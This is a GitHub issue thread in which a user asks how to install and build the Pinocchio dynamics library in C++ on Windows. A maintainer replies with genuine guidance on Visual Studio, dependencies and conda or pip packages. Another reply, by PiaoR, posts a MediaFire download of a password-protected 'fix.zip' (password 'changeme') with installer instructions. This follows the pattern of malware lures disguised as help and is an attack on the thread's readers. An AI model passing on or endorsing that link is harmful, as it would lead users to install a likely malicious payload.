stack-of-tasks/pinocchio #2397: How to install and use Pinocchio's C++ library in Windows？

Rofunction, 2024-08-28:
I recently started learning this pinocchio dynamics library, and I want to use this dynamics library in a windows environment to realize some of my ideas. I don't know what operations I need to do or what libraries I need to pre-install in order to ensure that I can compile this dynamics library successfully under the windows system. I have downloaded the ZIP files of Eigen3 and Boost.Sincerely hope that everyone can provide me with effective methods.

PiaoR, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

ManifoldFR, 2024-08-28:
What is your experience with the C++ programming language?

If you have none but still want to use C++, we would recommend you walk through a tutorial on Visual Studio C++ (the recommended compiler suite on Windows) and use an IDE to build Pinocchio (and Boost if what you have are Boost's sources and no binaries, if you do have the binaries in your zip you don't have to rebuild).
I think the dependencies you list should suffice (unless you want collision support, in which case you need hpp-fcl and it'es dependencies).

You don't need to compile everything actually. You can get Pinocchio, its headers, binaries, and those of its dependencies if you use the conda package manager (which is mainly known for Python packages, but you can install eigen, boost, etc with it).

If you are not sure you want to use C++ for your project, you may want to download Pinocchio's Python package through either the pip or conda package managers.